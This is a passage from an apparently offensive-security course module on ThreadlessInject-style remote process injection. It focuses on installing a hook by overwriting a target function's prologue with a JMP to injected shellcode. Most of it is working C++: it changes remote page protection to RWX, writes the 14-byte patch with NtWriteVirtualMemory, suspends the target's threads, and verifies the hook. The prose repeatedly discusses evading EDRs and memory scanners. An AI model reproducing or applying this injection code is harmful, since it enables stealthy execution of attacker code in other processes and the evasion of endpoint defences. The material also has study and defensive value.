Module 6: Installing the Remote Hook
The moment of truth: overwriting the target function's prologue to redirect execution.
The Final Step Before Execution
At this point, the shellcode and hook stub are sitting in executable memory inside the target process, waiting to be called. The only remaining step is to overwrite the first 14 bytes of the target function with a JMP instruction that redirects to our hook stub. This is the most dangerous operation in the entire chain: you are modifying executable code in a running process. If another thread is executing those bytes at the moment you overwrite them, the process crashes.
Constructing the Hook Jump
The hook is a 14-byte absolute jump that redirects execution from the target function's entry point to the hook stub in our allocated memory region:
C++// Build the 14-byte absolute JMP that will overwrite the function prologue
BYTE hookJmp[14];
// JMP [RIP+0] - opcode FF 25, with 00000000 as RIP-relative offset
hookJmp[0] = 0xFF;
hookJmp[1] = 0x25;
*(DWORD*)(hookJmp + 2) = 0x00000000; // Offset 0: address follows immediately
// The 8-byte absolute address of our hook stub in the remote process
*(UINT64*)(hookJmp + 6) = (UINT64)remoteHookStubAddr;
// hookJmp now contains:
// FF 25 00 00 00 00 [8 bytes: address of hook stub]
// When executed, the CPU reads the 8 bytes after the JMP instruction
// and loads them into RIP, transferring control to our hook stub
Making the Target Function Writable
Code pages in a running process are typically mapped as PAGE_EXECUTE_READ (RX). You cannot write to them without first changing the page protection. This requires NtProtectVirtualMemory on the remote process:
C++// Step 1: Change the target function's page protection to RWX temporarily
PVOID protectAddr = (PVOID)hookedFuncAddr;
SIZE_T protectSize = 14; // We only need to write 14 bytes
ULONG oldProtect = 0;
NTSTATUS status = NtProtectVirtualMemory(
hProcess,
&protectAddr,
&protectSize,
PAGE_EXECUTE_READWRITE, // Temporarily make writable + executable
&oldProtect // Save old protection (should be PAGE_EXECUTE_READ)
);
// Step 2: Write the 14-byte hook JMP over the function prologue
SIZE_T written = 0;
NtWriteVirtualMemory(
hProcess,
(PVOID)hookedFuncAddr, // Destination: start of target function
hookJmp, // Source: our 14-byte JMP
14, // Size: exactly 14 bytes
&written
);
// Step 3: Restore original page protection
NtProtectVirtualMemory(
hProcess,
&protectAddr,
&protectSize,
oldProtect, // Restore to original protection (RX)
&oldProtect
);
The RWX Window
Notice that for a brief moment, the target function's code page has PAGE_EXECUTE_READWRITE protection. This is a transient state — the protection is changed, the 14 bytes are written, and the protection is immediately restored. A memory scanner running at exactly the right moment could detect this temporary RWX state, but in practice the window is microseconds long. ThreadlessInject minimizes this window by performing the write as quickly as possible.
Thread Safety During Hook Installation
The most dangerous race condition in any hooking technique is the moment of overwriting the target bytes. If a thread in the target process is executing the function at the exact instruction that you are overwriting, the thread will execute a partially-overwritten instruction and crash. Consider what happens step by step:
Race Condition: Partial Hook Write
There are several strategies to mitigate this risk:
Strategy 1: Atomic 8-Byte Writes
On x86-64 processors, aligned 8-byte writes are guaranteed to be atomic. Unfortunately, our 14-byte hook exceeds this limit. However, you can split the approach: if you can fit a 5-byte relative JMP (E9 xx xx xx xx) that reaches a nearby trampoline, you only need to overwrite 5 bytes, and with careful alignment, the critical first 8 bytes can be written atomically using an interlocked operation.
C++// Atomic write strategy using InterlockedCompareExchange64
// This only works if your detour is within +/- 2GB (relative JMP range)
// and you can fit the patch in 8 bytes
// Build an 8-byte patch: 5-byte relative JMP + 3 bytes of NOPs
BYTE patch[8] = {0};
INT32 relOffset = (INT32)((INT64)hookStubAddr - (INT64)(hookedFuncAddr + 5));
patch[0] = 0xE9; // JMP rel32
*(INT32*)(patch + 1) = relOffset; // 32-bit relative offset
patch[5] = 0x90; patch[6] = 0x90; patch[7] = 0x90; // NOP padding
// Atomic 8-byte write (in-process example; remote requires different approach)
InterlockedCompareExchange64(
(volatile LONG64*)hookedFuncAddr,
*(LONG64*)patch, // New value (our JMP + NOPs)
*(LONG64*)hookedFuncAddr // Expected current value
);
ThreadlessInject's Approach
In practice, ThreadlessInject uses the simpler NtWriteVirtualMemory approach for the full 14-byte overwrite. The rationale is that thread safety concerns are mitigated by choosing a target function that is not being actively executed at the moment of hook installation. If the function is one that threads call periodically (like a sleep or wait function), there is typically a window between calls where no thread is executing the prologue. The risk is accepted as low for well-chosen targets.
Strategy 2: Suspend/Resume Target Threads
A more robust (but noisier) approach is to suspend all threads in the target process before installing the hook, then resume them after:
C++// Suspend all threads in target process before hook installation
// WARNING: This is detectable and can cause deadlocks
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);
std::vector<HANDLE> threads;
if (Thread32First(hSnap, &te32)) {
do {
if (te32.th32OwnerProcessID == targetPid) {
HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME, FALSE, te32.th32ThreadID);
if (hThread) {
SuspendThread(hThread);
threads.push_back(hThread);
}
}
} while (Thread32Next(hSnap, &te32));
}
// Install the hook (safe now, all threads are suspended)
InstallHookJmp(hProcess, hookedFuncAddr, hookJmp);
// Resume all threads
for (HANDLE h : threads) {
ResumeThread(h);
CloseHandle(h);
}
However, suspending threads is itself detectable (EDRs monitor SuspendThread calls targeting other processes) and can cause deadlocks if a suspended thread holds a lock that other code needs. ThreadlessInject avoids this approach in favor of the simpler non-atomic write with careful target selection.
Verifying Hook Installation
After writing the hook, a prudent implementation verifies that the write succeeded by reading back the bytes:
C++// Verify the hook was installed correctly
BYTE verification[14] = {0};
NtReadVirtualMemory(hProcess, (PVOID)hookedFuncAddr, verification, 14, NULL);
// Compare with expected hook bytes
if (memcmp(verification, hookJmp, 14) != 0) {
// Hook installation failed - another thread may have modified the bytes
// or an EDR may have blocked the write
printf("[-] Hook verification failed!\n");
// Cleanup: free remote memory, close handles
return FALSE;
}
printf("[+] Hook installed successfully at 0x%p\n", (void*)hookedFuncAddr);
The Complete Installation Sequence
Putting it all together, here is the full sequence of operations for hook installation:
Hook Installation Timeline
What Happens Next
At this point, the hook is installed. The target function's first 14 bytes are now a JMP to your hook stub. The next time any thread in the target process calls that function, execution will transfer to the hook stub, which will save registers, call the shellcode, restore registers, execute the original prologue bytes, and jump back to the function. From the injector's perspective, the job is done — you can close the process handle and exit. The shellcode will execute asynchronously whenever a target thread calls the hooked function.
Pop Quiz: Installing the Remote Hook
Q1: Why must you change the target function's page protection before writing the hook?
Q2: Why does ThreadlessInject avoid suspending all threads before hook installation?
Q3: What is the advantage of a 5-byte relative JMP (E9) over the 14-byte absolute JMP (FF 25)?